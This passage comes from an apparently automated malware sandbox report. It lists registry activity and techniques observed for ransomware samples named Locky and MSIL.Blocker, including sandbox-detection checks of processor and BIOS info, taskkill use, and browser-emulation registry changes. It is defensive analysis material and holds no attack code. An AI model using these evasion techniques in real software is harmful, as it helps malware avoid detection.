\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Chromium Updater Module.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Chromium Updater Module.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 3 IoCs
pid Process 1724 taskkill.exe 3464 taskkill.exe 3076 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe = "11001" Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fast.exe = "9999" Fast.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Chromium Updater Module.exe = "11001" Chromium Updater Module.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "DebugPlugin" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "{A79020BC-1F7E-4D20-AC2A-51D73012DDD5}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\L1040" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "既定の音声として%1を選びました" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheVersion = "1" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; message=NativeSupported; address=NativeSupported; media=NativeSupported; telephone=NativeSupported; currency=NativeSupported; url=NativeSupported; alphanumeric=NativeSupported" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SW" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "5218064" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech SW Voice Activation - French (France)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Cosimo - Italian (Italy)" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "11.0.2016.0129" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Laura" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Paul" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\M1041Haruka" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Traditional Chinese Phone Converter" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Stefan - German (Germany)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\L3082" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech Recognition Engine - fr-FR Embedded DNN v11.1" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "L1036" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Anywhere;Trailing" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Katja" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "411" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; computer=NativeSupported; address=NativeSupported; currency=NativeSupported; message=NativeSupported; url=NativeSupported; alphanumeric=NativeSupported" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "11.0.2013.1022" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\tn3082.bin" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_HW_es-ES.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Julie" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Paul - French (France)" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\AI041033" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech SW Voice Activation - Japanese (Japan)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech HW Voice Activation - Japanese (Japan)" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "German Phone Converter" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "MS-1031-110-WINMO-DNN" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HW" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech Recognition Engine - it-IT Embedded DNN v11.1" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "{2984A9DB-5689-43AD-877D-14999A15DD46}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\L1033" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR fr-FR Lookup Lexicon" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\fr-FR\\M1036Paul" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Hortense - French (France)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\r1040sr.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; address=NativeSupported; message=NativeSupported; url=NativeSupported; currency=NativeSupported; alphanumeric=NativeSupported" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "1" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR fr-FR Locale Handler" SearchApp.exe -
